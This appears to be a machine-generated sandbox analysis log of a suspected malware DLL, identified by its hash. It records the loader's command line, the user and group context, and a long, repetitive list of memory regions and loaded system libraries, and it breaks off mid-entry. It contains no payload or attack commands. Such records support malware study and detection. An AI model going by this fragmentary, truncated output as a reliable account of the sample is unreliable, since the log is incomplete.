"\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14299 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14300 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14301 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 14302 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 14303 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 14304 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14305 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 14306 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14307 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 14308 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 14309 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14357 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 14358 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14359 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14360 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14361 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 14362 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14363 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14364 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14365 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 14366 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 14406 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14407 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14408 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 14409 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14410 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14411 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 14412 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14413 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14414 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14415 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14416 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14417 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 14418 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14467 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14468 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14469 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14470 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 14471 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14472 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 14473 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 14528 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 14529 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14530 start_va = 0x1e60000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 14531 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 14576 start_va = 0x1e60000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x1e80da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14577 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 14578 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 14677 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 14678 start_va = 0x1ff0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 14679 start_va = 0x21f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 14738 start_va = 0x25f0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 14832 start_va = 0x2df0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 15659 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 15672 start_va = 0x3dc0000 end_va = 0x40f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15698 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 15699 start_va = 0x4100000 end_va = 0x4389fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 15858 start_va = 0x4100000 end_va = 0x4244fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 15959 start_va = 0x4100000 end_va = 0x42c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 16916 start_va = 0x4100000 end_va = 0x5694fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 16977 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 16979 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 16980 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 16981 start_va = 0x4100000 end_va = 0x42ccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 16982 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 16983 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 16984 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 16986 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 16987 start_va = 0x4100000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 17016 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 17052 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17053 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17054 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 17055 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17056 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17057 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17096 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17097 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17098 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17099 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17100 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17101 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17102 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17103 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17104 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17105 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17106 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17107 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17108 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17109 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17110 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17111 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17112 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17113 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17114 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17115 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17116 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17117 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17118 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17119 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17120 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17121 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17122 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17123 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17124 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17125 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17126 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17127 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17128 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17129 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17130 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17131 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17132 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17133 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17171 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17172 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17173 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17174 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17175 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17176 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17177 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17178 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17179 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17180 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17181 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17182 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17183 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17184 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17185 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17186 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17187 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17188 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17189 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17190 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17191 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17192 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17193 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17194 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17195 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17196 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17197 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17198 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17199 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17200 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17201 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17202 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17203 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17204 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17205 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17206 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17207 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17208 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 